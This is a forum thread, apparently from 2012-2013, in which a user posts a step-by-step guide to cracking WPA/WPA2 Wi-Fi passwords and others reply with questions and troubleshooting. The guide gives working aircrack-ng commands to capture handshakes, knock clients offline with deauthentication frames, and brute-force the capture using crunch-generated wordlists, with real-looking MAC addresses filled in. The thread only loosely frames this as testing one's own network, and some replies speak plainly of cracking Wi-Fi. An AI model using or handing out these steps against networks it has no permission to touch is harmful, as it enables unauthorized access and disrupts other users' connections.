Well, this post is because I am tired of these dictionary files that are constantly increasing in size, to the point where they cease to be portable, so instead of buy a higher capacity USB memory. I decided to do some research and I think this is a great option to use as a last resort as this is a brute force method. so as the post says. the programs to use are the aircrack-ng suite and crunch That said... :dance first we put our wireless card on monitor mode: (open Root Shell Window) Code: Select All airmon-ng start wlan0 airodump-ng mon0, (or ath1, or ...) the card will start listen to networks, wait 'till your essid appear which has to be WPA or WPA2 encoded mine is INFINITUMCBA277 so select yours now that you have the MAC address and the ch# Code: Select All airodump-ng -c CH# --bssid 'YOURMACADDRESS' -w ESSID mon0 it should look like this: Code: Select All airodump-ng -c 6 --bssid 58:98:35:CB:A2:77 -w INFINITUMCBA277 mon0 so now we wait forever for a handshake or we can deauthenticate a client to obtain a handshake in order to do that we must have the MAC of the client: Code: Select All aireplay-ng -0 10 -a 'YOURMACADDRESS' -c 'CLIENTSMACADDRESS' mon0 it should look like this: Code: Select All aireplay-ng -0 10 -a 58:98:35:CB:A2:77 -c 70: D4:F2:91:AE:67 mon0 once the user is deauthenticated and reconnect we'll obtain the handshake if the command didn't work, well... try again (if after u did the deauthenticate command noting seems to happend... maybe you are too far from the client 'cause this command goes directly to the client's connection.) you will see something like: WPA handshake 58:98:35:CB:A2:77 so now we use crunch we wil use the *.cap file were the handshake was saved usually in Xiaopan OS is in /home/tc/ so the syntaxis is: Code: Select All crunch 8 8 0123456789 | aircrack-ng -a 2 'HOME-TC-FILE-CAP' -e 'ESSID' -b 'HANDSHAKE' -w - it should look like this: Code: Select All crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w - Then you just have to wait for crunch and aircrack-ng to verify each combination. i highlight the last command because i want to explain it so you can adapt the program to your needs: Code: Select All crunch 8 8 0123456789 | aircrack-ng -a 2 /home/tc/INFINITUMCBA277-02.cap -e INFINITUMCBA277 -b 58:98:35:CB:A2:77 -w - So we start with the first instruction: crunch is the wordlist generator crunch 8 8 crunch 8 8 Second: the '8 8' is for the length of the word in characters, the first '8' indicates starting length and the second '8' the ending length. So if you want to test your security with 16 characters password you can change to '16 16,' or '8 16.' crunch 8 8 0123456789 Third: '0123456789' this is the list of characters to include in the wordlist for a numeric password. note: 75 % of users use numeric passwords. but you can also try something like: '01234567890abcdefghijklf' by using an alphanumeric wordlist the time will increase as this is a brute force method. 0123456789 | aircrack-ng Fourth: this symbol is very important --> | <-- as it indicates the end of instructions for crunch and the new instructions for aircrack-ng. Last but not least: the place were the .cap file is has to be accurate :idea Well there's a lot of program that do things like this, i just like it better to do it by myself . Well this is it, let me know if you find this post useful :dance
Just curios the the wifi that i was trying to crack had CCMP cipher, so my question is if it is possible to crack a network with a CCMP cipher using the above method or does it have to be a WEP or TKIP cipher
Well this method is for wpa/wpa2 networks so CCMP cipher is still a wpa/wpa2, just remember that this method is a bruteforce so if you are looking forward to have a more secure network, if your router supports it, set it to only beacon once a second - that should deter anyone trying to Bruteforce.
let me see if i am on the same page... when u look and say crunch and type the letters it makes the list for? so crunch 8 8 abc will make a 8 letter word only useing those 3 letters ? or did i mis read something
how fast is this the same as a dic file or faster? i am currently hashing a 40 gig file ... i have another 27 gig dic file... if this is faster i much pref this also can you do a bt (gnome) walkthough on it or is it the same thing
thank you that was informative i will try that later i will have to do all letters and numbers tho XD i have a HUGE password --- Double Post Merged, 19 Nov 2012 --- @ mrmanuelmtz, alt+179 = │
Guys, I manage to create word list with Crunch. My pass phrase abkcmtshab. In order to shorten my pentest time I use /pentest/passwords/crunch/./crunch 10 10 abchkmst -t abkc@@@@@@ -o <name.txt> The lists is only 1mb. After 4way handshake started aircrack. Final results : Passphrase not in dictionary! How could this be? I've double check to make sure abkcmtshab is in my txt file before starting aircrack. Anyone care to explain Problem solved after running wpaclean on my cap file:joy
Hi mrmanuelmtz i like your idea of crunch and aircrack instead of wordlist but i'm not knowing when are you opening a new root shell each time can u specify me when do you open a new root shell? And where should the handshake appear please specify this to me also.and hey thanks very much in advance
| is on top of "enter" key under "backspace" key same key where \ backslash is at..shift + \ will give you |
Aircrack started trying the pins and everything worked fine but when the current passphrase reached the same numbers as my password nothing happened and it continued trying combination --- Double Post Merged, 12 Dec 2012 --- Hi mrmanuelmtz your method worked with my ralink just wondering does it work with the built in wifi of the laptop?thanks in advance
thnx for the reply --- Double Post Merged, 9 Jan 2013 --- hi mrmanuelmtz said :"Well there's a lot of program that do things like this, i just like it better to do it by myself ."does anyone know a program that uses crunch and aircrack-ng automatically without the need of writing all these commands? and thanks in advance
